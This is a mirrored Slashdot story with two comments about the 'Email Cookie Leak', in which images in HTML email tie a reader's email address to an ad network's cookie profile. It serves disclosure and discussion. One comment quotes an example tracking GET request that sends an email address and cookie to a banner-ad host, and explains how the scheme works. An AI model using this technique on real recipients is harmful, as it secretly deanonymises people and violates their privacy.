Slashdot Mirror

← Back to Stories (view on slashdot.org)

Cookies are Security Hole in HTML Email

Posted by jamie on from the not-again dept.

Richard Smith just keeps uncovering security holes. Today it's the Email Cookie Leak. By reading mail, you unknowingly register your email address in someone's database, and accept their cookie. Next time you browse their site, or a site they have banner ads or other GIFs on, you are essentially broadcasting your email address while you surf. As Smith points out, just wait until banner-ad companies start taking advantage of this. I repeat the suggestion I made in October: browsers (and all clients that speak HTTP) should reject cookies not sent with the page.

2 of 152 comments (clear)

  1. From the article by Money__ · · Score: 4
    From the article In Netscape Messenger, the GET request looks like: GET /sync.gif?email=john@doe.com HTTP/1.0
    Connection: Keep-Alive
    User-Agent: Mozilla/4.7 [en] (Win98; I)
    Host: www.mybannerads.com
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png
    Accept-Encoding: gzip
    Accept-Language: en
    Accept-Charset: iso-8859-1,*,utf-8
    Cookie: id=c643640a

    Both the Email address and cookie value is included in the Outlook and Messenger GET requests. When the GET request is processed by the MyBannerAds server. It first extracts the customer id number from the cookie and looks it up its database of "anonymous" profiles of Web surfers. Once it has located the profile, it then extracts the Email address from the URL query string, turning a once "anonymous" profile into an "identified" profile.

    So where does MyBannerAds get the Email addresses in first place to send out a message which includes the SYNC.GIF file? The answer is quite simple, they "rent" the Email addresses. Or more specifically, the rent space in junk Email messages that are already being sent out. The IMG tags typically take less than 100 bytes, so they can easily be embedded in messages that are part of any Email ad campaign that is using HTML Email messages.
    Another interesting discusion about HTML Email and cookies can be found @: http://www.tiac.net/users/smiths /privacy/wbfaq.htm

  2. HTML, not HTTP by Hrunting · · Score: 5

    I'm glad we live in a world where Slashdot's YRO keeps us vigilant against the supposedly harmful effects of Internet society. I mean, if you think about it, there are many more Internet technologies that can, when used improperly, cause security violations on your system.

    In this case, browsers simply need to be setup to function as individual components. The web browser should not have access to the same mechanisms as an e-mail client. HTML e-mail is different from loading a web page and should be treated as such. Cookies are not a part of HTML; they are a part of HTTP! The browsers shouldn't confuse the two. This isn't a problem with the implementations of cookies, this is a problem with the implementation of HTML e-mail and the web browser.

    And the idea that loading cookies from only that page is ludicrous. The whole idea is to be able to give an entire site access to information so that you can do things on different pages with similar information without having to repeatedly ask for that information. There's nothing in the HTTP specification that makes this harmful. Someone simply didn't implement the specification properly so now clients can share cookie files, leading to a possible hidden exchange of data between them.